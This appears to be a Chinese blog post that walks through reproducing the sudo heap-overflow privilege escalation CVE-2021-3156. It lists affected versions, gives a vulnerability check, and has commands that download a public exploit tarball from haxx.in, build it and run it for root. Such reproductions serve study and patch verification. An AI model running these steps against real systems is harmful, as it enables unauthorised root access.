0%

CVE-2021-3156 提权漏洞复现

CVE-2021-3156 提权漏洞

title

漏洞介绍

Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。

2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。

当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

影响版本

1
2
3
4
5
6
7
8
9
10
11
12
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

#ECS受影响的镜像版本
Alibaba Cloud Linux 2
CentOS 6/7/8
Red Hat Enterprise Linux 6/7/8
Ubuntu 14/16/18/20
Debian 8/9/10
SUSE Linux Enterprise Server 12/15
OpenSUSE 42.3/15
FreeBSD 11/12

测试系统是否易受此漏洞影响:

  • 以非root用户身份登录系统。
  • 运行命令“sudoedit -s /”
  • 如果出现以“ sudoedit:”开头的错误响应,则系统受到此漏洞影响;如果出现以“ usage:”开头的错误响应,则表示该漏洞已被补丁修复。

环境配置

1
2
3
4
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156
make

提权

执行./sudo-hax-me-a-sandwich 列出可选择目标,这里选Debain

res

----------------本文结束感谢阅读----------------